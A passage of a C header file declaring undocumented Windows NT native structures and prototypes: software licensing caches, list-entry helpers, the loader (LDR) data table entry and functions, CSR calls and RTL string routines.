typedef struct _SL_CACHE {
ULONG TotalSize;
ULONG SizeOfData;
ULONG SignatureSize;
ULONG Flags;
ULONG Version;
SL_KMEM_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];
} SL_CACHE, *PSL_CACHE;
typedef SL_CACHE SL_KMEM_CACHE;
typedef struct _SL_APPX_CACHE_VALUE_DESCRIPTOR {
UCHAR HashedName[32];
ULONGLONG Expiration;
ULONG DataSize;
WCHAR Name[ANYSIZE_ARRAY];
} SL_APPX_CACHE_VALUE_DESCRIPTOR, *PSL_APPX_CACHE_VALUE_DESCRIPTOR;
typedef struct _SL_APPX_CACHE {
ULONG Version;
ULONG Flags;
ULONG DataSize;
ULONGLONG DataCheckSum;
SL_APPX_CACHE_VALUE_DESCRIPTOR Descriptors[ANYSIZE_ARRAY];
} SL_APPX_CACHE, *PSL_APPX_CACHE;
/*
** SOFTWARE LICENSING END
*/
/*
** List Entry macro START (wdm.h)
*/
#if defined (NTOS_ENABLE_LIST_ENTRY_MACRO)
#define InitializeListHead32(ListHead) (\
(ListHead)->Flink = (ListHead)->Blink = PtrToUlong((ListHead)))
FORCEINLINE
VOID
InitializeListHead(
_Out_ PLIST_ENTRY ListHead
)
{
ListHead->Flink = ListHead->Blink = ListHead;
return;
}
_Must_inspect_result_
BOOLEAN
CFORCEINLINE
IsListEmpty(
_In_ const LIST_ENTRY* ListHead
)
{
return (BOOLEAN)(ListHead->Flink == ListHead);
}
FORCEINLINE
BOOLEAN
RemoveEntryList(
_In_ PLIST_ENTRY Entry
)
{
PLIST_ENTRY Blink;
PLIST_ENTRY Flink;
Flink = Entry->Flink;
Blink = Entry->Blink;
Blink->Flink = Flink;
Flink->Blink = Blink;
return (BOOLEAN)(Flink == Blink);
}
FORCEINLINE
PLIST_ENTRY
RemoveHeadList(
_Inout_ PLIST_ENTRY ListHead
)
{
PLIST_ENTRY Flink;
PLIST_ENTRY Entry;
Entry = ListHead->Flink;
Flink = Entry->Flink;
ListHead->Flink = Flink;
Flink->Blink = ListHead;
return Entry;
}
FORCEINLINE
PLIST_ENTRY
RemoveTailList(
_Inout_ PLIST_ENTRY ListHead
)
{
PLIST_ENTRY Blink;
PLIST_ENTRY Entry;
Entry = ListHead->Blink;
Blink = Entry->Blink;
ListHead->Blink = Blink;
Blink->Flink = ListHead;
return Entry;
}
FORCEINLINE
VOID
InsertTailList(
_Inout_ PLIST_ENTRY ListHead,
_Inout_ __drv_aliasesMem PLIST_ENTRY Entry
)
{
PLIST_ENTRY Blink;
Blink = ListHead->Blink;
Entry->Flink = ListHead;
Entry->Blink = Blink;
Blink->Flink = Entry;
ListHead->Blink = Entry;
return;
}
FORCEINLINE
VOID
InsertHeadList(
_Inout_ PLIST_ENTRY ListHead,
_Inout_ __drv_aliasesMem PLIST_ENTRY Entry
)
{
PLIST_ENTRY Flink;
Flink = ListHead->Flink;
Entry->Flink = Flink;
Entry->Blink = ListHead;
Flink->Blink = Entry;
ListHead->Flink = Entry;
return;
}
FORCEINLINE
VOID
AppendTailList(
_Inout_ PLIST_ENTRY ListHead,
_Inout_ PLIST_ENTRY ListToAppend
)
{
PLIST_ENTRY ListEnd = ListHead->Blink;
ListHead->Blink->Flink = ListToAppend;
ListHead->Blink = ListToAppend->Blink;
ListToAppend->Blink->Flink = ListHead;
ListToAppend->Blink = ListEnd;
return;
}
FORCEINLINE
PSINGLE_LIST_ENTRY
PopEntryList(
_Inout_ PSINGLE_LIST_ENTRY ListHead
)
{
PSINGLE_LIST_ENTRY FirstEntry;
FirstEntry = ListHead->Next;
if (FirstEntry != NULL) {
ListHead->Next = FirstEntry->Next;
}
return FirstEntry;
}
FORCEINLINE
VOID
PushEntryList(
_Inout_ PSINGLE_LIST_ENTRY ListHead,
_Inout_ __drv_aliasesMem PSINGLE_LIST_ENTRY Entry
)
{
Entry->Next = ListHead->Next;
ListHead->Next = Entry;
return;
}
#define ASSERT_LIST_ENTRY_VALID(ListEntry) { \
if (ListEntry == NULL) \
return; \
if (ListEntry->Flink == NULL || ListEntry->Blink == NULL) \
return; \
}
#define ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, X) { \
if (ListEntry == NULL) \
return X; \
if (ListEntry->Flink == NULL || ListEntry->Blink == NULL) \
return X; \
}
#define ASSERT_LIST_ENTRY_VALID_BOOLEAN(ListEntry) ASSERT_LIST_ENTRY_VALID_ERROR_X(ListEntry, FALSE)
#endif /* NTOS_ENABLE_LIST_ENTRY_MACRO */
/*
** List Entry macro END
*/
/*
** LDR START
*/
#define LDR_DLL_NOTIFICATION_REASON_LOADED 1
#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2
typedef enum _LDR_DLL_LOAD_REASON {
LoadReasonStaticDependency = 0,
LoadReasonStaticForwarderDependency,
LoadReasonDynamicForwarderDependency,
LoadReasonDelayloadDependency,
LoadReasonDynamicLoad,
LoadReasonAsImageLoad,
LoadReasonAsDataLoad,
LoadReasonEnclavePrimary,
LoadReasonEnclaveDependency,
LoadReasonPatchImage,
LoadReasonUnknown = -1
} LDR_DLL_LOAD_REASON, * PLDR_DLL_LOAD_REASON;
//
// Dll Characteristics for LdrLoadDll
//
#define LDR_IGNORE_CODE_AUTHZ_LEVEL 0x00001000
//
// LdrAddRef Flags
//
#define LDR_ADDREF_DLL_PIN 0x00000001
//
// LdrLockLoaderLock Flags
//
#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002
//
// LdrUnlockLoaderLock Flags
//
#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
//
// LdrGetDllHandleEx Flags
//
#define LDR_GET_DLL_HANDLE_EX_UNCHANGED_REFCOUNT 0x00000001
#define LDR_GET_DLL_HANDLE_EX_PIN 0x00000002
//
// LdrGetProcedureAddressEx Flags
//
#define LDR_GET_PROCEDURE_ADDRESS_DONT_RECORD_FORWARDER 0x00000001
#define RESOURCE_TYPE_LEVEL 0
#define RESOURCE_NAME_LEVEL 1
#define RESOURCE_LANGUAGE_LEVEL 2
#define RESOURCE_DATA_LEVEL 3
typedef struct _LDR_RESOURCE_INFO {
ULONG_PTR Type;
ULONG_PTR Name;
ULONG Lang;
} LDR_RESOURCE_INFO, * PLDR_RESOURCE_INFO;
typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
union
{
LIST_ENTRY InInitializationOrderLinks;
LIST_ENTRY InProgressLinks;
} DUMMYUNION0;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
union
{
ULONG Flags;
struct
{
ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1
ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1
ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1
ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1
ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1
ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1
ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1
ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1
ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1
ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1
ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2
ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1
ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1
ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1
ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1
ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2
ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1
ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1
ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1
ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1
ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1
ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1
ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1
ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1
ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2
ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1
ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2
ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1
};
} ENTRYFLAGSUNION;
WORD ObsoleteLoadCount;
WORD TlsIndex;
union
{
LIST_ENTRY HashLinks;
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
} DUMMYUNION1;
union
{
ULONG TimeDateStamp;
PVOID LoadedImports;
} DUMMYUNION2;
//fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL
} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;
typedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;
typedef BOOLEAN(NTAPI* PLDR_INIT_ROUTINE)(
_In_ PVOID DllHandle,
_In_ ULONG Reason,
_In_opt_ PVOID Context
);
typedef struct _LDR_SERVICE_TAG_RECORD
{
struct _LDR_SERVICE_TAG_RECORD* Next;
ULONG ServiceTag;
} LDR_SERVICE_TAG_RECORD, * PLDR_SERVICE_TAG_RECORD;
typedef struct _LDRP_CSLIST
{
PSINGLE_LIST_ENTRY Tail;
} LDRP_CSLIST, * PLDRP_CSLIST;
typedef enum _LDR_DDAG_STATE
{
LdrModulesMerged = -5,
LdrModulesInitError = -4,
LdrModulesSnapError = -3,
LdrModulesUnloaded = -2,
LdrModulesUnloading = -1,
LdrModulesPlaceHolder = 0,
LdrModulesMapping = 1,
LdrModulesMapped = 2,
LdrModulesWaitingForDependencies = 3,
LdrModulesSnapping = 4,
LdrModulesSnapped = 5,
LdrModulesCondensed = 6,
LdrModulesReadyToInit = 7,
LdrModulesInitializing = 8,
LdrModulesReadyToRun = 9
} LDR_DDAG_STATE;
typedef struct _LDR_DDAG_NODE
{
LIST_ENTRY Modules;
PLDR_SERVICE_TAG_RECORD ServiceTagList;
ULONG LoadCount;
ULONG LoadWhileUnloadingCount;
ULONG LowestLink;
union
{
LDRP_CSLIST Dependencies;
SINGLE_LIST_ENTRY RemovalLink;
};
LDRP_CSLIST IncomingDependencies;
LDR_DDAG_STATE State;
SINGLE_LIST_ENTRY CondenseLink;
ULONG PreorderNumber;
} LDR_DDAG_NODE, * PLDR_DDAG_NODE;
typedef enum _LDR_HOT_PATCH_STATE
{
LdrHotPatchBaseImage = 0,
LdrHotPatchNotApplied = 1,
LdrHotPatchAppliedReverse = 2,
LdrHotPatchAppliedForward = 3,
LdrHotPatchFailedToPatch = 4,
LdrHotPatchStateMax = 5,
} LDR_HOT_PATCH_STATE, * PLDR_HOT_PATCH_STATE;
//
// Full declaration of LDR_DATA_TABLE_ENTRY
//
typedef struct _LDR_DATA_TABLE_ENTRY_FULL
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
union
{
LIST_ENTRY InInitializationOrderLinks;
LIST_ENTRY InProgressLinks;
};
PVOID DllBase;
PLDR_INIT_ROUTINE EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
union
{
UCHAR FlagGroup[4];
ULONG Flags;
struct
{
ULONG PackagedBinary : 1;
ULONG MarkedForRemoval : 1;
ULONG ImageDll : 1;
ULONG LoadNotificationsSent : 1;
ULONG TelemetryEntryProcessed : 1;
ULONG ProcessStaticImport : 1;
ULONG InLegacyLists : 1;
ULONG InIndexes : 1;
ULONG ShimDll : 1;
ULONG InExceptionTable : 1;
ULONG ReservedFlags1 : 2;
ULONG LoadInProgress : 1;
ULONG LoadConfigProcessed : 1;
ULONG EntryProcessed : 1;
ULONG ProtectDelayLoad : 1;
ULONG ReservedFlags3 : 2;
ULONG DontCallForThreads : 1;
ULONG ProcessAttachCalled : 1;
ULONG ProcessAttachFailed : 1;
ULONG CorDeferredValidate : 1;
ULONG CorImage : 1;
ULONG DontRelocate : 1;
ULONG CorILOnly : 1;
ULONG ChpeImage : 1;
ULONG ChpeEmulatorImage : 1;
ULONG ReservedFlags5 : 1;
ULONG Redirected : 1;
ULONG ReservedFlags6 : 2;
ULONG CompatDatabaseProcessed : 1;
};
};
USHORT ObsoleteLoadCount;
USHORT TlsIndex;
LIST_ENTRY HashLinks;
ULONG TimeDateStamp;
PACTIVATION_CONTEXT EntryPointActivationContext;
PVOID Lock;
PLDR_DDAG_NODE DdagNode;
LIST_ENTRY NodeModuleLink;
PVOID LoadContext;
PVOID ParentDllBase;
PVOID SwitchBackContext;
RTL_BALANCED_NODE BaseAddressIndexNode;
RTL_BALANCED_NODE MappingInfoIndexNode;
ULONG_PTR OriginalBase;
LARGE_INTEGER LoadTime;
ULONG BaseNameHashValue;
LDR_DLL_LOAD_REASON LoadReason;
ULONG ImplicitPathOptions;
ULONG ReferenceCount;
ULONG DependentLoadFlags;
UCHAR SigningLevel;
ULONG CheckSum;
PVOID ActivePatchImageBase;
LDR_HOT_PATCH_STATE HotPatchState;
} LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL;
typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
ULONG Flags; //Reserved.
PCUNICODE_STRING FullDllName; //The full path name of the DLL module.
PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.
PVOID DllBase; //A pointer to the base address for the DLL in memory.
ULONG SizeOfImage; //The size of the DLL image, in bytes.
} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;
typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
ULONG Flags; //Reserved.
PCUNICODE_STRING FullDllName; //The full path name of the DLL module.
PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.
PVOID DllBase; //A pointer to the base address for the DLL in memory.
ULONG SizeOfImage; //The size of the DLL image, in bytes.
} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;
typedef union _LDR_DLL_NOTIFICATION_DATA {
LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;
LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;
typedef const LDR_DLL_NOTIFICATION_DATA* PCLDR_DLL_NOTIFICATION_DATA;
typedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(
_In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,
_In_ PVOID Context,
_Inout_ BOOLEAN *StopEnumeration
);
typedef VOID(CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)(
_In_ ULONG NotificationReason,
_In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData,
_In_opt_ PVOID Context);
#ifndef LDR_IS_DATAFILE
#define LDR_IS_DATAFILE(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)1)
#endif
#ifndef LDR_IS_IMAGEMAPPING
#define LDR_IS_IMAGEMAPPING(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)2)
#endif
#ifndef LDR_IS_RESOURCE
#define LDR_IS_RESOURCE(DllHandle) (LDR_IS_IMAGEMAPPING(DllHandle) || LDR_IS_DATAFILE(DllHandle))
#endif
#ifndef IMAGE_FILE_MACHINE_CHPE_X86
#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64
#endif
#ifndef IMAGE_FILE_MACHINE_ARM64EC
#define IMAGE_FILE_MACHINE_ARM64EC 0xA641
#endif
#ifndef IMAGE_FILE_MACHINE_ARM64X
#define IMAGE_FILE_MACHINE_ARM64X 0xA64E
#endif
NTSYSAPI
NTSTATUS
NTAPI
LdrAccessResource(
_In_ PVOID DllHandle,
_In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,
_Out_opt_ PVOID *Address,
_Out_opt_ PULONG Size);
NTSYSAPI
NTSTATUS
NTAPI
LdrAddRefDll(
_In_ ULONG Flags,
_In_ PVOID DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrEnumerateLoadedModules(
_In_ ULONG Flags,
_In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,
_In_opt_ PVOID Context);
NTSYSAPI
NTSTATUS
NTAPI
LdrFindResource_U(
_In_ PVOID DllHandle,
_In_ CONST ULONG_PTR* ResourceIdPath,
_In_ ULONG ResourceIdPathLength,
_Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry);
NTSYSAPI
NTSTATUS
NTAPI
LdrFindResourceEx_U(
_In_ ULONG Flags,
_In_ PVOID DllHandle,
_In_ PLDR_RESOURCE_INFO ResourceInfo,
_In_ ULONG Level,
_Out_ PIMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry);
NTSYSAPI
NTSTATUS
NTAPI
LdrFindResourceDirectory_U(
_In_ PVOID DllHandle,
_In_ PLDR_RESOURCE_INFO ResourceInfo,
_In_ ULONG Level,
_Out_ PIMAGE_RESOURCE_DIRECTORY *ResourceDirectory);
NTSYSAPI
NTSTATUS
NTAPI
LdrFindEntryForAddress(
_In_ PVOID Address,
_Out_ PLDR_DATA_TABLE_ENTRY *TableEntry);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetDllHandle(
_In_opt_ PCWSTR DllPath,
_In_opt_ PULONG DllCharacteristics,
_In_ PCUNICODE_STRING DllName,
_Out_ PVOID *DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetDllHandleEx(
_In_ ULONG Flags,
_In_opt_ PWSTR DllPath,
_In_opt_ PULONG DllCharacteristics,
_In_ PUNICODE_STRING DllName,
_Out_opt_ PVOID *DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetDllHandleByMapping(
_In_ PVOID BaseAddress,
_Out_ PVOID *DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetDllHandleByName(
_In_opt_ PUNICODE_STRING BaseDllName,
_In_opt_ PUNICODE_STRING FullDllName,
_Out_ PVOID *DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetDllFullName(
_In_ PVOID DllHandle,
_Out_ PUNICODE_STRING FullDllName);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetDllDirectory(
_Out_ PUNICODE_STRING DllDirectory);
NTSYSAPI
NTSTATUS
NTAPI
LdrSetDllDirectory(
_In_ PUNICODE_STRING DllDirectory);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetProcedureAddress(
_In_ PVOID DllHandle,
_In_opt_ CONST ANSI_STRING* ProcedureName,
_In_opt_ ULONG ProcedureNumber,
_Out_ PVOID *ProcedureAddress);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetProcedureAddressForCaller(
_In_ PVOID DllHandle,
_In_opt_ PANSI_STRING ProcedureName,
_In_opt_ ULONG ProcedureNumber,
_Out_ PVOID *ProcedureAddress,
_In_ ULONG Flags,
_In_ PVOID *Callback);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetProcedureAddressEx(
_In_ PVOID DllHandle,
_In_opt_ PANSI_STRING ProcedureName,
_In_opt_ ULONG ProcedureNumber,
_Out_ PVOID* ProcedureAddress,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
LdrGetKnownDllSectionHandle(
_In_ PCWSTR DllName,
_In_ BOOLEAN KnownDlls32,
_Out_ PHANDLE Section);
NTSYSAPI
NTSTATUS
NTAPI
LdrLoadDll(
_In_opt_ PCWSTR DllPath,
_In_opt_ PULONG DllCharacteristics,
_In_ PCUNICODE_STRING DllName,
_Out_ PVOID *DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrUnloadDll(
_In_ PVOID DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrQueryProcessModuleInformation(
_Out_ PRTL_PROCESS_MODULES ModuleInformation,
_In_ ULONG ModuleInformationLength,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
LdrRegisterDllNotification(
_In_ ULONG Flags,
_In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,
_In_opt_ PVOID Context,
_Out_ PVOID *Cookie);
NTSYSAPI
NTSTATUS
NTAPI
LdrUnregisterDllNotification(
_In_ PVOID Cookie);
NTSYSAPI
NTSTATUS
NTAPI
LdrResSearchResource(
_In_ PVOID File,
_In_ CONST ULONG_PTR* ResIds,
_In_ ULONG ResIdCount,
_In_ ULONG Flags,
_Out_ LPVOID *Resource,
_Out_ ULONG_PTR *Size,
_In_opt_ USHORT *FoundLanguage,
_In_opt_ ULONG *FoundLanguageLength);
NTSYSAPI
NTSTATUS
NTAPI
LdrOpenImageFileOptionsKey(
_In_ PCUNICODE_STRING ImagePathName,
_In_ BOOLEAN Wow64Path,
_Out_ PHANDLE KeyHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrQueryImageFileExecutionOptions(
_In_ PCUNICODE_STRING ImagePathName,
_In_ PCWSTR OptionName,
_In_ ULONG Type,
_Out_ PVOID Buffer,
_In_ ULONG BufferSize,
_Out_opt_ PULONG ResultSize);
NTSYSAPI
BOOLEAN
NTAPI
LdrIsModuleSxsRedirected( //LdrEntry->Flags->Redirected
_In_ PVOID DllHandle);
NTSYSAPI
NTSTATUS
NTAPI
LdrQueryImageFileExecutionOptionsEx(
_In_ PCUNICODE_STRING ImagePathName,
_In_ PCWSTR OptionName,
_In_ ULONG Type,
_Out_ PVOID Buffer,
_In_ ULONG BufferSize,
_Out_opt_ PULONG ResultSize,
_In_ BOOLEAN Wow64Path);
NTSYSAPI
NTSTATUS
NTAPI
LdrQueryImageFileKeyOption(
_In_ HANDLE KeyHandle,
_In_ PCWSTR OptionName,
_In_ ULONG Type,
_Out_ PVOID Buffer,
_In_ ULONG BufferSize,
_Out_opt_ PULONG ResultSize);
NTSYSAPI
NTSTATUS
NTAPI
LdrDisableThreadCalloutsForDll(
_In_ PVOID DllImageBase);
#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002
#define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID 0x00000000
#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED 0x00000001
#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED 0x00000002
#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001
NTSYSAPI
NTSTATUS
NTAPI
LdrLockLoaderLock(
_In_ ULONG Flags,
_Out_opt_ ULONG *Disposition,
_Out_ PVOID *Cookie);
NTSYSAPI
NTSTATUS
NTAPI
LdrUnlockLoaderLock(
_In_ ULONG Flags,
_Inout_ PVOID Cookie);
NTSYSAPI
NTSTATUS
NTAPI
LdrRelocateImage(
_In_ PVOID NewBase,
_In_opt_ PSTR LoaderName,
_In_ NTSTATUS Success,
_In_ NTSTATUS Conflict,
_In_ NTSTATUS Invalid);
NTSYSAPI
PIMAGE_BASE_RELOCATION
NTAPI
LdrProcessRelocationBlock(
_In_ ULONG_PTR VA,
_In_ ULONG SizeOfBlock,
_In_ PUSHORT NextOffset,
_In_ LONG_PTR Diff);
DECLSPEC_NORETURN
NTSYSAPI
VOID
NTAPI
LdrShutdownProcess(
VOID);
DECLSPEC_NORETURN
NTSYSAPI
VOID
NTAPI
LdrShutdownThread(
VOID);
NTSYSAPI
BOOLEAN
NTAPI
LdrControlFlowGuardEnforced(
VOID);
/*
** LDR END
*/
/*
** Runtime Library API START
*/
/************************************************************************************
*
* CSR API.
*
************************************************************************************/
NTSYSAPI
ULONG
NTAPI
CsrGetProcessId(
VOID);
NTSYSAPI
NTSTATUS
NTAPI
CsrClientConnectToServer(
_In_ PWSTR ObjectDirectory,
_In_ ULONG ServerDllIndex,
_Inout_ PVOID ConnectionInformation,
_Inout_ ULONG *ConnectionInformationLength,
_Out_ PBOOLEAN CalledFromServer);
/************************************************************************************
*
* RTL Strings API.
*
************************************************************************************/
#define RTL_DUPLICATE_UNICODE_STRING_NULL_TERMINATE (0x00000001)
#define RTL_DUPLICATE_UNICODE_STRING_ALLOCATE_NULL_STRING (0x00000002)
#ifndef RtlInitEmptyUnicodeString
#define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \
((_ucStr)->Buffer = (_buf), \
(_ucStr)->Length = 0, \
(_ucStr)->MaximumLength = (USHORT)(_bufSize))
#endif
FORCEINLINE
VOID
NTAPI
RtlInitEmptyAnsiString(
_Out_ PANSI_STRING AnsiString,
_Pre_maybenull_ _Pre_readable_size_(MaximumLength) PCHAR Buffer,
_In_ USHORT MaximumLength
)
{
memset(AnsiString, 0, sizeof(ANSI_STRING));
AnsiString->MaximumLength = MaximumLength;
AnsiString->Buffer = Buffer;
}
NTSYSAPI
BOOLEAN
NTAPI
RtlCreateUnicodeString(
_Out_ PUNICODE_STRING DestinationString,
_In_ PCWSTR SourceString);
NTSYSAPI
BOOLEAN
NTAPI
RtlCreateUnicodeStringFromAsciiz(
_Out_ PUNICODE_STRING DestinationString,
_In_ PSTR SourceString);
NTSYSAPI
VOID
NTAPI
RtlInitString(
_Out_ PSTRING DestinationString,
_In_opt_ PCSZ SourceString);
NTSYSAPI
VOID
NTAPI
RtlInitUnicodeString(
_Out_ PUNICODE_STRING DestinationString,
_In_opt_ PCWSTR SourceString);
NTSYSAPI
NTSTATUS
NTAPI
RtlInitUnicodeStringEx(
_Out_ PUNICODE_STRING DestinationString,
_In_opt_ PCWSTR SourceString);
NTSYSAPI
BOOLEAN
NTAPI
RtlEqualUnicodeString(
_In_ PCUNICODE_STRING String1,
_In_ PCUNICODE_STRING String2,
_In_ BOOLEAN CaseInSensitive);
NTSYSAPI
NTSTATUS
NTAPI
RtlDuplicateUnicodeString(
_In_ ULONG Flags,
_In_ PUNICODE_STRING StringIn,
_Out_ PUNICODE_STRING StringOut);
NTSYSAPI
WCHAR
NTAPI
RtlUpcaseUnicodeChar(
_In_ WCHAR SourceCharacter);
NTSYSAPI
WCHAR
NTAPI
RtlDowncaseUnicodeChar(
_In_ WCHAR SourceCharacter);
NTSYSAPI
BOOLEAN
NTAPI
RtlIsNameInExpression(
_In_ PUNICODE_STRING Expression,
_In_ PUNICODE_STRING Name,
_In_ BOOLEAN IgnoreCase,
_In_opt_ PWCH UpcaseTable);
NTSYSAPI
NTSTATUS
NTAPI
RtlStringFromGUID(
_In_ GUID *Guid,
_Out_ PUNICODE_STRING GuidString);
NTSYSAPI
NTSTATUS
NTAPI
RtlGUIDFromString(
_In_ PUNICODE_STRING GuidString,
_Out_ GUID *Guid);
NTSYSAPI
BOOLEAN
NTAPI
RtlPrefixUnicodeString(
_In_ PCUNICODE_STRING String1,
_In_ PCUNICODE_STRING String2,
_In_ BOOLEAN CaseInSensitive);
NTSYSAPI
NTSTATUS
NTAPI
RtlFormatCurrentUserKeyPath(
_Out_ PUNICODE_STRING CurrentUserKeyPath);
NTSYSAPI
VOID
NTAPI
RtlFreeUnicodeString(
_In_ PUNICODE_STRING UnicodeString);
NTSYSAPI
VOID
NTAPI
RtlEraseUnicodeString(
_Inout_ PUNICODE_STRING String);
NTSYSAPI
VOID
NTAPI
RtlFreeAnsiString(
_In_ PANSI_STRING AnsiString);
NTSYSAPI
NTSTATUS
NTAPI
RtlAnsiStringToUnicodeString(
_Out_ PUNICODE_STRING DestinationString,
_In_ PCANSI_STRING SourceString,
_In_ BOOLEAN AllocateDestinationString);
NTSYSAPI
NTSTATUS
NTAPI
RtlUnicodeStringToAnsiString(
_Inout_ PANSI_STRING DestinationString,
_In_ PUNICODE_STRING SourceString,
_In_ BOOLEAN AllocateDestinationString);
NTSYSAPI
WCHAR
NTAPI
RtlAnsiCharToUnicodeChar(
_Inout_ PUCHAR *SourceCharacter);
NTSYSAPI
NTSTATUS
NTAPI
RtlUnicodeToMultiByteSize(
_Out_ PULONG BytesInMultiByteString,
_In_reads_bytes_(BytesInUnicodeString) PWCH UnicodeString,
_In_ ULONG BytesInUnicodeString);
NTSYSAPI
BOOLEAN
NTAPI
RtlDosPathNameToNtPathName_U(
_In_ PCWSTR DosFileName,
_Out_ PUNICODE_STRING NtFileName,
_Out_opt_ PWSTR *FilePart,
_Reserved_ PVOID Reserved);
NTSYSAPI
LONG
NTAPI
RtlCompareUnicodeStrings(
_In_reads_(String1Length) PWCHAR String1,
_In_ SIZE_T String1Length,
_In_reads_(String2Length) PWCHAR String2,
_In_ SIZE_T String2Length,
